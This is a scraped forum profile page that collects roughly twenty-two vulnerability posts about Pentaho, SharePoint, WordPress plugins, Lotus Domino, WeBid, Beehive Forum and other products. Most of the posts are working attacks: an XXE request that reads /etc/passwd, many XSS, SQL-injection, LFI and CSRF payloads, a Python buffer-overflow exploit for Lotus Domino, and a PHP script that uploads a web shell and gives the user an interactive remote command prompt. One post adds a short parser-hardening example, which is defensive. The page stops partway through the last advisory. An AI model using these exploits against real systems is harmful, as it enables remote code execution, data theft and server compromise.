HireHackking

Everything posted by HireHackking

  1. ========================================================================
     title: Pentaho User Console XML Injection Vulnerability
     program: Pentaho BI User Console
     vulnerable version: Pentaho < 4.5.0
     homepage: http://www.pentaho.com/
     Tested on: Linux x86/x86_64
     found: Feb. 5 2014
     Original Discovery by: Taylor Tippins
     Exploit By: K.d Long kd@stonedcoder.org
     ========================================================================

     Vendor description:
     -------------------
     The Pentaho Business Analytics suite manages Business Intelligence solutions, generates reports, aggregates data, and provides users access to analysis views.

     Vulnerability description:
     --------------------------
     The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's filesystem. This entity was then used within a data field in the XML document. The server's response contains the contents of the specified file, indicating that the parser processed the injected external entity.

     By manipulating the POST request to "/pentaho/content/dashboards" it is possible to inject arbitrary XML declarations and tags. This request is triggered while a user is creating a customized dashboard.

     Proof of concept:
     -----------------
     The following entity declaration creates a new XML entity with the content of the /etc/passwd file, which can then be referenced in the XML request content:

     ---cut here---
     POST /pentaho/content/dashboards HTTP/1.1
     Host: example.com
     User-Agent: Mozilla/5.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Referer: https://example.com/pentaho/content/dashboards?command=new
     Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
     Content-Length: 2458
     Connection: keep-alive

     command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]>
     <dashboard>
       <title>New Dashboard</title>
       <heading>New Dashboard</heading>
       <enableWidgetPrinting>false</enableWidgetPrinting>
       <documentation>
         <author>test</author>
         <description></description>
         <icon></icon>
       </documentation>
       <template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>
       <theme-ref>00-Onyx</theme-ref>
       <layout>
         <overlay xmlns:pho="http://www.pentaho.com">
           <box id="Panel_1" pho:title="Untitled 1" type="titled-panel" flex="1" collapsed="false" />
           <box id="Panel_2" pho:title="Untitled 2" type="titled-panel" flex="1" collapsed="false" />
           <box id="Panel_3" pho:title="Untitled 3" type="titled-panel" flex="1" collapsed="false" />
           <box id="Panel_4" pho:title="Untitled 4" type="titled-panel" flex="1" collapsed="false" />
           <box id="Panel_5" pho:title="Untitled 5"/>
           <box id="Panel_6" pho:title="Untitled 6"/>
           <box id="Panel_7" pho:title="Untitled 7"/>
           <box id="Panel_8" pho:title="Untitled 8"/>
           <box id="Panel_9" pho:title="Untitled 9"/>
           <box id="Panel_10" pho:title="Untitled 10"/>
           <box id="titlebar" title="" height="23" hidden="false" width="0" type="pagetitle" collapsed="false" />
           <box id="widget-area" type="scrollarea"/>
           <box id="widget-area" flex="1"/>
           <box id="FilterPanel" title="" height="100" hidden="true" width="0" type="povpanel" collapsed="false" />
           <box id="hbox1" type="layout"/>
           <box id="hbox1" flex="1"/>
           <box id="hbox2" type="layout"/>
           <box id="hbox2" flex="1"/>
         </overlay>
       </layout>
       <parameters> </parameters>
       <widgetJavascript><![CDATA[[]]]></widgetJavascript>
     </dashboard>
     &type=html
     ---cut here---

     Vulnerable versions:
     --------------------
     Pentaho User Console Release 4.5.0.GA.49857

     Vendor contact timeline:
     ------------------------
     02/16/2014: Vendor notified via email
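A hardened JAXP parser configuration that rejects the DOCTYPE used in the PoC above, as an added example that is not Pentaho's code or part of the advisory: the entity name and dashboard elements come from the advisory, while the class and method names are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

// Added example: hardened JAXP parsing of a dashboardXml value. Class and
// method names are assumptions; the payload is built from the advisory.
public class DashboardXmlParser {

    // A DocumentBuilder that refuses any DOCTYPE, so no entity (internal or
    // SYSTEM/PUBLIC) can be declared at all. The feature URIs are the Xerces
    // ones understood by the JDK's built-in parser.
    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Primary control: reject <!DOCTYPE ...> outright.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that ignore the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Parse a dashboardXml value and return the dashboard <title> text.
    // Throws SAXParseException if the document carries a DOCTYPE.
    static String dashboardTitle(String dashboardXml) throws Exception {
        Document doc = hardenedBuilder().parse(
                new ByteArrayInputStream(dashboardXml.getBytes(StandardCharsets.UTF_8)));
        return doc.getElementsByTagName("title").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the advisory's entity declaration in front of a
        // minimal dashboard, and the same dashboard without it.
        String injected =
                "<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM \"file:///etc/passwd\"> ]>"
              + "<dashboard><title>New Dashboard</title>"
              + "<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref></dashboard>";
        String benign = "<dashboard><title>New Dashboard</title></dashboard>";

        System.out.println("benign  : " + dashboardTitle(benign));
        try {
            dashboardTitle(injected);
            System.out.println("injected: parsed, parser is NOT hardened");
        } catch (SAXParseException e) {
            // Expected: "DOCTYPE is disallowed when the feature ... set to true."
            System.out.println("injected: rejected -> " + e.getMessage());
        }
    }
}
```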
  2. source: https://www.securityfocus.com/bid/49614/info

     Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

     Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable.

     http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E
  3. source: https://www.securityfocus.com/bid/49620/info

     Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.

     The following products are affected:
     Microsoft SharePoint 2007
     Microsoft SharePoint 2010

     http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]
  4. source: https://www.securityfocus.com/bid/49625/info

     Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.

     http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
  5. source: https://www.securityfocus.com/bid/49650/info

     StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

     StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected.

     http://www.example.com/[path]/index.php?language_file=[LFI]%00
  6. source: https://www.securityfocus.com/bid/49660/info

     PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

     GET /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>

     GET /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>

     POST /delete.php?id=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>

     POST /edit.php?id=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

     POST /login.php?action=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>

     POST /misc.php?email=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

     POST /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>

     POST /register.php?action=>"'><script>alert(oink)</script>
     form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>
  7. source: https://www.securityfocus.com/bid/49667/info

     ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

     ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.

     http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin
  8. source: https://www.securityfocus.com/bid/49668/info

     Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     http://www.example.com/v1/urundetay.asp?id=21%28%29
     http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
     http://www.example.com/v1/linkler.asp?id=2%28%29
     http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
     http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
     http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
     http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin
  9. source: https://www.securityfocus.com/bid/49673/info

     Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

     Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected.

     Cross Site Scripting Vulnerabilities

     <html>
     <title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title>
     <body bgcolor="#1C1C1C">
     <script type="text/javascript">
     function xss(){document.forms["xss"].submit();}
     </script>
     <br /><br />
     <form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
     <input type="hidden" name="currPath" value='"><script>alert(1)</script>' />
     <input type="hidden" name="path" value='"><script>alert(2)</script>' />
     </form>
     <a href="javascript: xss();" style="text-decoration:none">
     <b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br />
     </body></html>

     HTTP Response Splitting
     ====================================================================
     /edit.php (lines 3-16):
     --------------------------------------------------------------------
     $charSet = "iso-8859-1";
     $dir = "ltr";

     if ( isset( $_POST[ "charSet" ] ) )
     {
         $charSet = $_POST[ "charSet" ];

         if ( $charSet == "windows-1255" )
         {
             $dir = "rtl";
         }
     }

     header( "Content-Type: text/html; charset=" . $charSet );
  10. source: https://www.securityfocus.com/bid/49674/info

     Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

     Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected.

     http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]
  11. source: https://www.securityfocus.com/bid/49676/info

     Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities. Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.

     $ dscl localhost -read /Search/Users/bob
     $ dscl localhost -passwd /Search/Users/<username>
  12. source: https://www.securityfocus.com/bid/49675/info

     net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

     The following products are affected:
     net4visions iBrowser 1.4.1 Build 10182009
     net4visions iManager 1.2.8 Build 02012008
     net4visions iGallery 1.0.0

     iBrowser Plugin
     http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert('zsl')</script>
     http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert('zsl')</script>

     iManager Plugin
     http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=<script>alert('zsl')</script>
     http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert('zsl')</script>

     iGallery Plugin
     http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=<script>alert('zsl')</script>
  13. source: https://www.securityfocus.com/bid/49677/info

     Card sharj is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     Card sharj 1.01 is vulnerable; other versions may also be affected.

     http://www.example.com/index.php?cardId=[sql inject]
     http://www.example.com/index.php?action=[sql inject]
     http://www.example.com/Card-sharj-scripts/admin/index.php
     Username & Password: admin' or '1=1
  14. source: https://www.securityfocus.com/bid/49705/info

     IBM Lotus Domino is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting this issue will allow remote attackers to execute arbitrary code with system-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial-of-service condition.

     Lotus Domino 8.5.2 is vulnerable; other versions may also be affected.

     #!/usr/bin/python
     import socket,struct,sys,os

     host="192.168.x.y"          #server ip here!
     cookie="1234567890abcdef"   #Set your Cookie credential here! Cookie = base64((usr:pwd))
     #Shellcode = Using XOR [reg],reg to crash ("like" INT3 :))
     Shellcode=chr(0x30)
     server=host,80
     SEH=struct.pack("<L",0x60404672)  # POP ESI - POP EBP - RETN nnotes.dll.60404672
     nSEH=struct.pack("<L",0x4141347A) # INC ecx ;NOP
                                       # INC ecx ;NOP
                                       # JPE slep ;Detour
     vars="__Click=0&tHPRAgentName="   #tHPRAgentName => Vulnerable POST variable
     buf="A"*436                       #sended buffer-nSEH-SEH
     slep="X"*46                       #pre-shellcode to fix JPE landing

     #This function forges our POST request (with our Shellcode sure)
     def buildPOST(h,b,c):
         P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
         P+="Host: "+h+"\r\n"
         P+="User-Agent: oh sure\r\n"
         P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
         P+="Accept-Language: chinnese plz\r\n"
         P+="Accept-Encoding: gzip,deflate\r\n"
         P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
         P+="Keep-Alive: 115\r\n"
         P+="Connection: keep-alive\r\n"
         P+="Referer: http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
         P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
         P+="Authorization: Basic "+c+"\r\n"
         P+="Content-Type: application/x-www-form-urlencoded\r\n"
         P+="Content-Length: %s\r\n" % str(len(b))
         P+="\r\n"
         P+=b
         return P

     def main():
         if os.name=="nt":
             os.system("cls")
         else:
             os.system("clear")
         print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
         print"\t  ->[Remote Code Execution Exploit]<-\n\n"
         print"[+] Crafting buffer..."
         #Creating POST content data
         buffer=vars+buf+nSEH+SEH+slep+Shellcode
         print"[+] Connecting to server..."
         s=socket.socket()
         #Trying connect to IBM Lotus Domino HTTP server
         try:
             s.connect(server)
         #We goin to exit if this fails
         except:
             print"[-] Error connecting to remote server..."
             sys.exit(0)
         print"[+] Crafting POST request..."
         #Crafting final POST
         post=buildPOST(host,buffer,cookie)
         print"[+] 0k, sending..."
         #Sending Shellcode to remote server
         s.send(post)
         #Server is running? Some fails :S
         try:
             print s.recv(2048)
             print"[x] Exploit failed!"
         #Else we achieve remote code execution successfully
         except:
             print"[+] Done!"
         s.close()
         print"\n[*] By @rmallof"

     if __name__=="__main__":
         main()
  15. source: https://www.securityfocus.com/bid/49712/info

     i-Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     i-Gallery 3.4 is vulnerable; other versions may also be affected.

     http://www.example.com/igallery.asp?d="><script>alert('kurd-team')</script>
  16. source: https://www.securityfocus.com/bid/49733/info

     OneCMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     OneCMS 2.6.4 is vulnerable; other versions may also be affected.

     http://www.example.com/boards.php?t=list&rank=[SQL insertion attacks]
     http://www.example.com/index.php?load=list&view=games&abc=[SQL insertion attacks]
  17. source: https://www.securityfocus.com/bid/49721/info

     Free Help Desk is prone to the following input-validation vulnerabilities:
       1. A cross-site scripting vulnerability
       2. Multiple SQL-injection vulnerabilities
       3. A cross-site request-forgery vulnerability

     Exploiting these issues could allow an attacker to execute arbitrary code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     Free Help Desk 1.1b is vulnerable; other versions may also be affected.

     SQL injection:

     URIs
     http://www.example.com/index.php?sub=users&action=edit&user_id=-1%27%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20+--+
     http://www.example.com/index.php?sub=types&action=edit&type_id=123%27%20union%20select%201,2,version%28%29,4,5,6%20+--+
     http://www.example.com/index.php?sub=help&action=details&call_id=1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20+--+
     http://www.example.com/index.php?sub=help&call_first_name=%22%20and%201=1%20+--+

     Inputs:
     <form action="http://www.example.com/index.php" method="post">
     <input type="hidden" name="user" value="' OR 1=1 -- ">
     <input type="hidden" name="pass" value="1">
     <input name="send" value="exploit" type="submit">
     </form>

     Cross-site scripting:

     URIs
     http://www.example.com/index.php?sub=types&action=add&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=types&action=edit&type_id=15&type=1&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=types&action=add&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=types&action=edit&type_id=8&type=2&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=staff&action=add&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=staff&action=edit&type_id=7&type=&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     http://www.example.com/index.php?sub=types&action=add&type=3&returnurl=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

     Cross-site request-forgery:

     Input:
     <form action="http://www.example.com/index.php?sub=users&action=store&type=add" method="post">
     <input type="hidden" name="user_id" value="">
     <input type="hidden" name="user_name" value="newadmin">
     <input type="hidden" name="user_login" value="newadmin">
     <input type="hidden" name="user_password" value="123456">
     <input type="hidden" name="user_password_confirm" value="123456">
     <input type="hidden" name="user_level" value="0">
     <input type="hidden" name="user_email" value="">
     <input type="submit" id="btn">
     </form>
     <script>
     document.getElementById('btn').click();
     </script>
  18. source: https://www.securityfocus.com/bid/49729/info

     phpRS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     phpRS 2.8.1 is vulnerable; other versions may also be affected.

     http://www.example.com/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
     http://www.example.com/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab
     http://www.example.com/phpRS Path/index.php?strana=%24%7binjecthere%7d
     http://www.example.com/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab
     http://www.example.com/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d
  19. source: https://www.securityfocus.com/bid/49740/info

     Zyncro is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.

     Note: To exploit these issues, an attacker must have the ability to create a new group and capture the packets transferred.

     An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

     Zyncro 3.0.1.20 is vulnerable; other versions may also be affected.

     One of the functionalities of Zyncro is the possibility of creating groups. The name and description of the groups are not correctly sanitized and it's possible to provoke some attacks. In order to do the attack, you must create a new group and capture the packet transferred to the server to modify it, because validation is done client-side (only) using javascript.

     The original request has three POST data parameters like:

     popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D

     The important data are the 'name' and 'description' parameters, which are base64 encoded. In this case, both values are 'test':

     url_decode(dGVzdA%3D%3D)
     b64decode(dGVzdA==)
     test

     It is possible to provoke the XSS by changing those values as follows:

     "><script>alert("XSS attack")</script>

     Values MUST be in base64, so:

     b64encode(""><script>alert("XSS attack")</script>") = Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=

     Finally the post-data of the request would become:

     popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d

     Once the request has reached the server, a new group would be created and any time that someone sees the name/description of the group, a pop-up would appear; this is the easiest attack.
  20. source: https://www.securityfocus.com/bid/49741/info

     Zyncro social network is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809
  21. <?php
     /*
       ,--^----------,--------,-----,-------^--,
       | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
       `+---------------------------^----------|
         `\_,-------, _________________________|
           / XXXXXX /`|     /
          / XXXXXX /  `\   /
         / XXXXXX /\______(
        / XXXXXX /
       / XXXXXX /
      (________(
       `------'

       Exploit Title   : WeBid 1.1.1 Unrestricted File Upload Exploit
       Date            : 20 February 2015
       Exploit Author  : CWH Underground
       Site            : www.2600.in.th
       Vendor Homepage : http://www.webidsupport.com/
       Software Link   : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
       Version         : 1.1.1
       Tested on       : Window and Linux

       #####################################################
       VULNERABILITY: Arbitrary File Upload Vulnerability
       #####################################################

       /ajax.php
       /inc/plupload/examples/upload.php

       #####################################################
       DESCRIPTION
       #####################################################

       This exploits a file upload vulnerability found in WeBid 1.1.1, and possibly prior.
       Attackers can abuse the upload feature in order to upload a malicious PHP file without
       authentication, which results in arbitrary remote code execution.

       #####################################################
       EXPLOIT
       #####################################################
     */

     error_reporting(0);
     set_time_limit(0);
     ini_set("default_socket_timeout", 5);

     function http_send($host, $packet)
     {
         if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
         fputs($sock, $packet);
         return stream_get_contents($sock);
     }

     print "\n+----------------------------------------+";
     print "\n| WeBid Unrestricted File Upload Exploit |";
     print "\n+----------------------------------------+\n";

     if ($argc < 3)
     {
         print "\nUsage......: php $argv[0] <host> <path>\n";
         print "\nExample....: php $argv[0] localhost /";
         print "\nExample....: php $argv[0] localhost /WeBid/\n";
         die();
     }

     $host = $argv[1];
     $path = $argv[2];

     $payload  = "--o0oOo0o\r\n";
     $payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
     $payload .= "shell.php\r\n";
     $payload .= "--o0oOo0o\r\n";
     $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
     $payload .= "Content-Type: application/octet-stream\r\n\r\n";
     $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
     $payload .= "--o0oOo0o--\r\n";

     $packet  = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
     $packet .= "Host: {$host}\r\n";
     $packet .= "Content-Length: ".strlen($payload)."\r\n";
     $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
     $packet .= "Cookie: PHPSESSID=cwh"."\r\n";
     $packet .= "Connection: close\r\n\r\n{$payload}";

     print "\n\nExploiting...";
     sleep(2);
     print "Waiting for shell...\n";
     sleep(2);

     http_send($host, $packet);

     $packet  = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
     $packet .= "Host: {$host}\r\n";
     $packet .= "Cmd: %s\r\n";
     $packet .= "Connection: close\r\n\r\n";

     print "\n  ,--^----------,--------,-----,-------^--,      \n";
     print "  | |||||||||   `--------'     |          O      \n";
     print "  `+---------------------------^----------|      \n";
     print "    `\_,-------, _________________________|      \n";
     print "      / XXXXXX /`|     /                         \n";
     print "     / XXXXXX /  `\   /                          \n";
     print "    / XXXXXX /\______(                           \n";
     print "   / XXXXXX /                                    \n";
     print "  / XXXXXX /   .. CWH Underground Hacking Team ..\n";
     print " (________(                                      \n";
     print "  `------'                                       \n";

     while(1)
     {
         print "\nWebid-shell# ";
         if (($cmd = trim(fgets(STDIN))) == "exit") break;
         $response = http_send($host, sprintf($packet, base64_encode($cmd)));
         preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
     }

     ################################################################################################################
     # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
     ################################################################################################################
     ?>
  22. Document Title:
===============
Beehive Forum v1.4.4 Stored XSS Vulnerability

Author:
=======
Halil Dalabasmaz

Release Date:
=============
23 Feb 2015

Product & Service Introduction:
===============================
Beehive is an open-source project for creating a highly configurable frame-based discussion forum.

Vendor Homepage:
================
http://www.beehiveforum.co.uk

Abstract Advisory Information:
==============================
BGA Security Team discovered a Stored XSS vulnerability in Beehive Forum v1.4.4.

Vulnerability Disclosure Timeline:
==================================
20 Feb 2015 - Contact with Vendor
21 Feb 2015 - Vendor Response
22 Feb 2015 - Vendor Fix
23 Feb 2015 - Confirm Fix
23 Feb 2015 - Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
Beehive Forum v1.4.4

Exploitation Technique:
=======================
Remote, Unauthenticated

Severity Level:
===============
High

Technical Details & Description:
================================
Stored XSS

Tested On:
==========
Iceweasel & Chromium

Sample Payload:
===============
http://"><script>alert('XSS');</script>

Proof of Concept (PoC):
=======================
The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" in the Profile section. The following lines in edit_prefs.php contain the vulnerability:

    if (isset($_POST['homepage_url'])) {

        $user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']);
        $user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true;

        if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) {

            // Only the leading "http://" is enforced; what follows it is not a URL check
            if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) {

